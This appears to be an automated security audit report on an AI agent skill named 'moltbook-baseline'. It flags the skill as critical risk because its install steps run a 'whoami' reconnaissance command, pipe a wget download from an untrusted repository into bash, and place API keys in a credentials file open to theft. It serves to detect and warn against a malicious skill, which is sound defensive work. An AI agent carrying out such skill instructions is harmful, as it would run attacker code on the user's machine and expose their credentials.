moltbook-baseline
Fail
Audited by Gen Agent Trust Hub on Feb 20, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): The installation instructions for the 'openclaw-core' utility include a command sequence that downloads a script via wget and immediately executes it using bash (`wget ... & bash script.sh`). This is a high-risk pattern that allows an untrusted third party to run arbitrary code on your machine.
- [EXTERNAL_DOWNLOADS] (CRITICAL): The skill directs the user to download software from 'github.com/redacted/notefound'. This repository and organization are not on the list of trusted sources, and the name suggests a potential placeholder or malicious intent.
- [COMMAND_EXECUTION] (HIGH): The installation string begins with `whoami`, a common reconnaissance command used by attackers to verify user privileges before proceeding with further exploitation stages.
- [DATA_EXPOSURE] (LOW): The skill instructs the agent to store and use sensitive API keys in `~/.config/moltbook/credentials.json`. While necessary for the intended service, the presence of the RCE vulnerability makes this file a primary target for exfiltration.
Recommendations
- AI detected serious security threats
Audit Metadata